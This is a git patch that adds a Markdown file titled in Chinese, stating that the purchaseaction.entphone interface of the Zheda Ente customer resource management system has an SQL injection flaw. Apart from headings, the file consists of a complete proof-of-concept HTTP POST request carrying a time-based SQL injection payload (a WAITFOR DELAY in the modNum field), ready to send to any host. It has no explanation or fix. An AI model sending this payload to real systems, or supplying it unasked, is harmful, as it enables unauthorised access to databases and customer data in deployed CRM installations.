From 90c1802379f783e48f87ec0a802166e126167b1c Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 1 Mar 2024 15:28:46 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=99=E5=A4=A7=E6=81=A9=E7=89=B9?= =?UTF-8?q?=E5=AE=A2=E6=88=B7=E8=B5=84=E6=BA=90=E7=AE=A1=E7=90=86=E7=B3=BB?= =?UTF-8?q?=E7=BB=9F-purchaseaction.entphone=E6=8E=A5=E5=8F=A3=E5=AD=98?= =?UTF-8?q?=E5=9C=A8SQL=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...管理系统-purchaseaction.entphone接口存在SQL漏洞.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞.md diff --git a/浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞.md b/浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞.md new file mode 100644 index 0000000..d6b7e52 --- /dev/null +++ b/浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞.md @@ -0,0 +1,17 @@ +## 浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞 + +## poc +``` +POST /entsoft/PurchaseAction.entphone;.png?method=AuthorityJudgement HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Content-Length: 34 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Cookie: JSESSIONID=90D5118EEBB1F0D4630E802596D8E42F + +modNum=1';WAITFOR DELAY '0:0:4'--+ +```